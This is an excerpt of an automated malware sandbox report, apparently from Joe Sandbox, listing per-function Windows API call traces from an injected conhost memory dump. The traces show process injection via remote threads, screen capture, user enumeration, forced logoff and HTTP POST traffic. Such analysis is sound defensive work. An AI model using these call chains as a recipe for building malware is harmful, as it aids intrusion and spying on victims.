Part of subcall function 001B8678: CloseHandle.KERNEL32(?), ref: 001B8697

CreateMutexW.KERNEL32(001C2C30,00000001,?,32901130,?,00000001,?), ref: 001B2D91
GetLastError.KERNEL32 ref: 001B2DA3
CloseHandle.KERNEL32(000001E6), ref: 001B2DBA

Part of subcall function 001AE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 001AE8E0

Part of subcall function 001B31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B31ED
Part of subcall function 001B31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 001B3216
Part of subcall function 001B31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 001B3271
Part of subcall function 001B31CC: CloseHandle.KERNEL32(00000000), ref: 001B328E
Part of subcall function 001B31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 001B32A1
Part of subcall function 001B31CC: CloseHandle.KERNEL32(?), ref: 001B330E
Part of subcall function 001B31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 001B331A
Part of subcall function 001B31CC: CloseHandle.KERNEL32(000001E6), ref: 001B332B

ExitWindowsEx.USER32(00000014,80000000), ref: 001B2DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 001B2E1C
SetEvent.KERNEL32(00000000), ref: 001B2E29
CloseHandle.KERNEL32(00000000), ref: 001B2E30

Part of subcall function 001B2A32: CloseHandle.KERNEL32(001C2AF0), ref: 001B2AF2

CloseHandle.KERNEL32(000001E6), ref: 001B2E42
ReadProcessMemory.KERNEL32(000000FF,001E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 001B2EA6
Sleep.KERNEL32(000001F4), ref: 001B2EB8
IsWellKnownSid.ADVAPI32(0129F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 001B2EC9
ReadProcessMemory.KERNEL32(000000FF,001E0014,00000000,00000001,00000000), ref: 001B2EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 001B2F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 001B2F50

Part of subcall function 001B97D0: VirtualProtect.KERNEL32(001BCA1A,?,00000040,00000000,001E0014,?,?,001B2F6C,?,?), ref: 001B97E5
Part of subcall function 001B97D0: VirtualProtect.KERNEL32(001BCA1A,?,00000000,00000000,?,?,001B2F6C,?,?), ref: 001B9818

CreateEventW.KERNEL32(001C2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 001B2FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001B2FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001B2FF7
CloseHandle.KERNEL32(0000000C), ref: 001B300D
CloseHandle.KERNEL32(?), ref: 001B3013
CloseHandle.KERNEL32(?), ref: 001B3016

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Part of subcall function 001BD0E6: LoadLibraryW.KERNEL32(?), ref: 001BD107
Part of subcall function 001BD0E6: GetProcAddress.KERNEL32(00000000,?), ref: 001BD128
Part of subcall function 001BD0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 001BD159
Part of subcall function 001BD0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 001BD17C
Part of subcall function 001BD0E6: FreeLibrary.KERNEL32(00000000), ref: 001BD1A3
Part of subcall function 001BD0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 001BD1D9
Part of subcall function 001BD0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 001BD212
Part of subcall function 001BD0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 001BD2AB
Part of subcall function 001BD0E6: NetApiBufferFree.NETAPI32(?), ref: 001BD2BE
Part of subcall function 001BD0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 001BD2E2

Part of subcall function 001B4E20: CharToOemW.USER32(?,?), ref: 001B4E35

Part of subcall function 001B6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,001B2E87,?,19367401,?,00000001,8889347B,00000002), ref: 001B6BA9
Part of subcall function 001B6B9E: CloseHandle.KERNEL32(00000000), ref: 001B6BB4

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

Part of subcall function 001BCCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,0129F800,00000000), ref: 001BCD57
Part of subcall function 001BCCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 001BCD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 001B2F35, 001B2F6C, 001B2F94
, xrefs: 001B2DD7
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 001B2F08

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001ADD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(001C2868,00000000,0000018C,00000000,00000000), ref: 001ADD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 001ADD4A
CreateEventW.KERNEL32(001C2C30,00000001,00000000,?,84889912,?,00000001), ref: 001ADD74
CreateMutexW.KERNEL32(001C2C30,00000000,?,18782822,?,00000001), ref: 001ADD97
CreateFileMappingW.KERNEL32(00000000,001C2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 001ADDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 001ADDD8
GetDC.USER32(00000000), ref: 001ADDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 001ADE15
GetDeviceCaps.GDI32(?,0000000A), ref: 001ADE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 001ADE32

Part of subcall function 001B9959: GetDIBits.GDI32(00000000,001ADE4B,00000000,00000001,00000000,00000000,00000000), ref: 001B9991
Part of subcall function 001B9959: GetDIBits.GDI32(00000000,001ADE4B,00000000,00000001,00000000,00000000,00000000), ref: 001B99A7
Part of subcall function 001B9959: DeleteObject.GDI32(001ADE4B), ref: 001B99B4
Part of subcall function 001B9959: CreateDIBSection.GDI32(00000000,00000000,00000000,001C2888,?,?), ref: 001B9A24
Part of subcall function 001B9959: DeleteObject.GDI32(001ADE4B), ref: 001B9A43

ReleaseDC.USER32(00000000,?), ref: 001ADE56

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

CreateMutexW.KERNEL32(001C2C30,00000000,?,1898B122,?,00000001,001C28B8,?,00000102,001C28A4,001C2E70,00000010,?,?), ref: 001ADF00
GetDC.USER32(00000000), ref: 001ADF15
CreateCompatibleDC.GDI32(00000000), ref: 001ADF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 001ADF3A
SelectObject.GDI32(00000000,00000000), ref: 001ADF4D
ReleaseDC.USER32(00000000,00000001), ref: 001ADF65

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B1A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 001B7E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 001B7E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 001B1A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B1A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 001B1AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 001B1AFD

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 001B1B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 001B1B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 001B1BC0

Part of subcall function 001B54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 001B5505
Part of subcall function 001B54F1: GetLastError.KERNEL32 ref: 001B550F
Part of subcall function 001B54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 001B552F

InternetCloseHandle.WININET(00000000), ref: 001B1C05
InternetCloseHandle.WININET(?), ref: 001B1C0F
InternetCloseHandle.WININET(?), ref: 001B1C19

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

GET, xrefs: 001B1A76, 001B1AA1
HTTP/1.1, xrefs: 001B1A98
POST, xrefs: 001B1A6F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AE240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 001AE26A
GetMenuItemCount.USER32(00000000), ref: 001AE280
GetMenuState.USER32(00000000,00000000,00000400), ref: 001AE298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 001AE2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 001AE2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 001AE2E2
EndMenu.USER32 ref: 001AE2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 001AE302
GetSubMenu.USER32(00000000,00000000), ref: 001AE326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 001AE340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 001AE361
GetMenuItemID.USER32(00000000,00000000), ref: 001AE379
SendMessageW.USER32(?,00000111,?,00000000), ref: 001AE392

Part of subcall function 001A54A9: GetWindowInfo.USER32(?,?), ref: 001A5515
Part of subcall function 001A54A9: IntersectRect.USER32(?,?,-00000114), ref: 001A5538
Part of subcall function 001A54A9: IntersectRect.USER32(?,?,-00000114), ref: 001A558E
Part of subcall function 001A54A9: GetDC.USER32(00000000), ref: 001A55D2
Part of subcall function 001A54A9: CreateCompatibleDC.GDI32(00000000), ref: 001A55E3
Part of subcall function 001A54A9: ReleaseDC.USER32(00000000,00000000), ref: 001A55ED
Part of subcall function 001A54A9: SelectObject.GDI32(00000000,?), ref: 001A5602
Part of subcall function 001A54A9: DeleteDC.GDI32(00000000), ref: 001A5610
Part of subcall function 001A54A9: TlsSetValue.KERNEL32(?), ref: 001A565B
Part of subcall function 001A54A9: EqualRect.USER32(?,?), ref: 001A5675
Part of subcall function 001A54A9: SaveDC.GDI32(00000000), ref: 001A5680
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A569B
Part of subcall function 001A54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 001A56BB
Part of subcall function 001A54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 001A56CD
Part of subcall function 001A54A9: RestoreDC.GDI32(00000000,?), ref: 001A56E4
Part of subcall function 001A54A9: SaveDC.GDI32(00000000), ref: 001A5706
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A571C
Part of subcall function 001A54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 001A5735
Part of subcall function 001A54A9: RestoreDC.GDI32(00000000,?), ref: 001A5743
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A5756
Part of subcall function 001A54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 001A5766
Part of subcall function 001A54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 001A5778
Part of subcall function 001A54A9: TlsSetValue.KERNEL32(00000000), ref: 001A5792
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A57B2
Part of subcall function 001A54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 001A57CE
Part of subcall function 001A54A9: SelectObject.GDI32(00000000,?), ref: 001A57E4
Part of subcall function 001A54A9: DeleteDC.GDI32(00000000), ref: 001A57EB
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A5813
Part of subcall function 001A54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 001A5829

SetKeyboardState.USER32 ref: 001AE3D1
SetEvent.KERNEL32 ref: 001AE3DD

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B70A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 001B70B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,001B73A4,?,?,00000000,?), ref: 001B70D5
GetProcAddress.KERNEL32(FCIAddFile,?,001B73A4,?,?,00000000,?), ref: 001B70E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,001B73A4,?,?,00000000,?), ref: 001B70F9
GetProcAddress.KERNEL32(FCIDestroy,?,001B73A4,?,?,00000000,?), ref: 001B710B
HeapCreate.KERNEL32(00000000,00080000,00000000,001B73A4,?,?,00000000,?), ref: 001B7136
FreeLibrary.KERNEL32(001B73A4,?,?,00000000,?), ref: 001B714B

Strings

cabinet.dll, xrefs: 001B70B0
FCIFlushCabinet, xrefs: 001B70E9
FCIAddFile, xrefs: 001B70D7
FCIDestroy, xrefs: 001B70FB
FCICreate, xrefs: 001B70CF

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A50A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(001C23AC,0000FDE9,?), ref: 001A515C

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

LeaveCriticalSection.KERNEL32(001C23AC,?,000000FF), ref: 001A51B7
EnterCriticalSection.KERNEL32(001C23AC), ref: 001A51D2
getpeername.WS2_32 ref: 001A527F

Part of subcall function 001B681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 001B6840

Strings

EASV, xrefs: 001A5250
]QPG, xrefs: 001A522A
Z\AV, xrefs: 001A5248
YISQ, xrefs: 001A50EF
YIST, xrefs: 001A523A
\[EP, xrefs: 001A50E8
OMAV, xrefs: 001A5232

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BD0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 001BD107
GetProcAddress.KERNEL32(00000000,?), ref: 001BD128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 001BD159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 001BD17C
FreeLibrary.KERNEL32(00000000), ref: 001BD1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 001BD1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 001BD212

Part of subcall function 001A7125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 001A7138
Part of subcall function 001A7125: PathUnquoteSpacesW.SHLWAPI(?), ref: 001A71A0
Part of subcall function 001A7125: ExpandEnvironmentStringsW.KERNEL32(?,001BD23A,00000104), ref: 001A71AD
Part of subcall function 001A7125: LocalFree.KERNEL32(?,.exe,00000000), ref: 001A71C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 001BD2AB

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

Part of subcall function 001B89C2: PathSkipRootW.SHLWAPI(?), ref: 001B89CD
Part of subcall function 001B89C2: GetFileAttributesW.KERNEL32(?,?,00000000,001BD261,?,?,?,?,?), ref: 001B89F5
Part of subcall function 001B89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,001BD261,?,?,?,?,?), ref: 001B8A03

Part of subcall function 001BC912: LoadLibraryW.KERNEL32(?), ref: 001BC929
Part of subcall function 001BC912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,001BD2A8), ref: 001BC955
Part of subcall function 001BC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?), ref: 001BC96C
Part of subcall function 001BC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?), ref: 001BC984
Part of subcall function 001BC912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?,00000000), ref: 001BC9A1
Part of subcall function 001BC912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?,00000000), ref: 001BCA0D

NetApiBufferFree.NETAPI32(?), ref: 001BD2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 001BD2E2

Part of subcall function 001B786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 001B78AC
Part of subcall function 001B786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 001B78B9

Strings

.exe, xrefs: 001BD1BB, 001BD267, 001BD2EE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BC095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

EnterCriticalSection.KERNEL32(001C3FE4), ref: 001BC0BC
LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC11A

Part of subcall function 001B1049: EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1064
Part of subcall function 001B1049: LeaveCriticalSection.KERNEL32(001C2AC8), ref: 001B10E7
Part of subcall function 001B1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 001B11B2
Part of subcall function 001B1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 001B13EC

LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC161

Part of subcall function 001B835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 001B83B8

Part of subcall function 001B82E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 001B831F

LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC2CC
EnterCriticalSection.KERNEL32(001C3FE4), ref: 001BC2EB
LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC34D

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC376
EnterCriticalSection.KERNEL32(001C3FE4), ref: 001BC395
LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC3DD

Strings

If-Modified-Since, xrefs: 001BC20F
Accept-Encoding, xrefs: 001BC1EB
identity, xrefs: 001BC1DF

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B3048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 001B20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 001B2105
Part of subcall function 001B20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B2172
Part of subcall function 001B20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 001B21A7
Part of subcall function 001B20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B21DB
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 001B21FA
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 001B220C
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 001B221E
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 001B2230
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 001B2242
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 001B2254
Part of subcall function 001B20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 001B228D
Part of subcall function 001B20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 001B229C
Part of subcall function 001B20C4: InitializeCriticalSection.KERNEL32(001C400C,?,?,00000000), ref: 001B22C9
Part of subcall function 001B20C4: WSAStartup.WS2_32(00000202,?), ref: 001B22DF
Part of subcall function 001B20C4: CreateEventW.KERNEL32(001C2C30,00000001,00000000,00000000,?,?,00000000), ref: 001B2300
Part of subcall function 001B20C4: GetLengthSid.ADVAPI32(00000000,000000FF,001C2C08,?,?,00000000), ref: 001B2335
Part of subcall function 001B20C4: GetCurrentProcessId.KERNEL32(00000000,0129F7D0,00000000,?,?,00000000), ref: 001B2362

SetErrorMode.KERNEL32(00008007,00000000), ref: 001B306F
GetCommandLineW.KERNEL32(?), ref: 001B3079
CommandLineToArgvW.SHELL32(00000000), ref: 001B3080
LocalFree.KERNEL32(00000000), ref: 001B30D5

Part of subcall function 001AE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 001AE108
Part of subcall function 001AE0FB: GetThreadDesktop.USER32(00000000), ref: 001AE10F
Part of subcall function 001AE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 001AE128

Part of subcall function 001A5BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C03
Part of subcall function 001A5BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C0A
Part of subcall function 001A5BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C1C
Part of subcall function 001A5BF6: SetEvent.KERNEL32(001C2868,?,00000001), ref: 001A5C69
Part of subcall function 001A5BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 001A5C76

Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADF87
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADF97
Part of subcall function 001ADF74: TlsFree.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFA2
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFB0
Part of subcall function 001ADF74: UnmapViewOfFile.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFBA
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFC7
Part of subcall function 001ADF74: SelectObject.GDI32(00000000,00000000), ref: 001ADFE1
Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADFF2
Part of subcall function 001ADF74: DeleteDC.GDI32(00000000), ref: 001ADFFF
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001AE010
Part of subcall function 001ADF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001AE01F
Part of subcall function 001ADF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 001AE038

Part of subcall function 001B2B08: GetModuleHandleW.KERNEL32(?), ref: 001B2B1F
Part of subcall function 001B2B08: GetProcAddress.KERNEL32(00000000,?), ref: 001B2B41

Part of subcall function 001B2D01: CreateMutexW.KERNEL32(001C2C30,00000001,?,32901130,?,00000001,?), ref: 001B2D91
Part of subcall function 001B2D01: GetLastError.KERNEL32 ref: 001B2DA3
Part of subcall function 001B2D01: CloseHandle.KERNEL32(000001E6), ref: 001B2DBA
Part of subcall function 001B2D01: ExitWindowsEx.USER32(00000014,80000000), ref: 001B2DFD
Part of subcall function 001B2D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 001B2E1C
Part of subcall function 001B2D01: SetEvent.KERNEL32(00000000), ref: 001B2E29
Part of subcall function 001B2D01: CloseHandle.KERNEL32(00000000), ref: 001B2E30
Part of subcall function 001B2D01: CloseHandle.KERNEL32(000001E6), ref: 001B2E42
Part of subcall function 001B2D01: ReadProcessMemory.KERNEL32(000000FF,001E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 001B2EA6
Part of subcall function 001B2D01: Sleep.KERNEL32(000001F4), ref: 001B2EB8
Part of subcall function 001B2D01: IsWellKnownSid.ADVAPI32(0129F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 001B2EC9
Part of subcall function 001B2D01: ReadProcessMemory.KERNEL32(000000FF,001E0014,00000000,00000001,00000000), ref: 001B2EF1
Part of subcall function 001B2D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 001B2F0D
Part of subcall function 001B2D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 001B2F50
Part of subcall function 001B2D01: CreateEventW.KERNEL32(001C2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 001B2FCE
Part of subcall function 001B2D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001B2FE7
Part of subcall function 001B2D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001B2FF7
Part of subcall function 001B2D01: CloseHandle.KERNEL32(0000000C), ref: 001B300D
Part of subcall function 001B2D01: CloseHandle.KERNEL32(?), ref: 001B3013
Part of subcall function 001B2D01: CloseHandle.KERNEL32(?), ref: 001B3016

Sleep.KERNEL32(000000FF,?,00000001), ref: 001B312B
ExitProcess.KERNEL32(00000000,00000000), ref: 001B313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 001B3157

Part of subcall function 001B2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 001B2574
Part of subcall function 001B2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25AB
Part of subcall function 001B2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25CB
Part of subcall function 001B2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,001B316D,?,00000000), ref: 001B261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00375903,00000000,00000000,00000000), ref: 001B3185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 001B3198
CloseHandle.KERNEL32(?), ref: 001B31A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 001B31B5
CloseHandle.KERNEL32(00000000), ref: 001B31BC

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001ADF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 001ADF87
CloseHandle.KERNEL32(00000000), ref: 001ADF97
TlsFree.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFA2
CloseHandle.KERNEL32(00000000), ref: 001ADFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFBA
CloseHandle.KERNEL32(00000000), ref: 001ADFC7
SelectObject.GDI32(00000000,00000000), ref: 001ADFE1
DeleteObject.GDI32(00000000), ref: 001ADFF2
DeleteDC.GDI32(00000000), ref: 001ADFFF
CloseHandle.KERNEL32(00000000), ref: 001AE010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001AE01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 001AE038

Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DD9
Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DE2

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

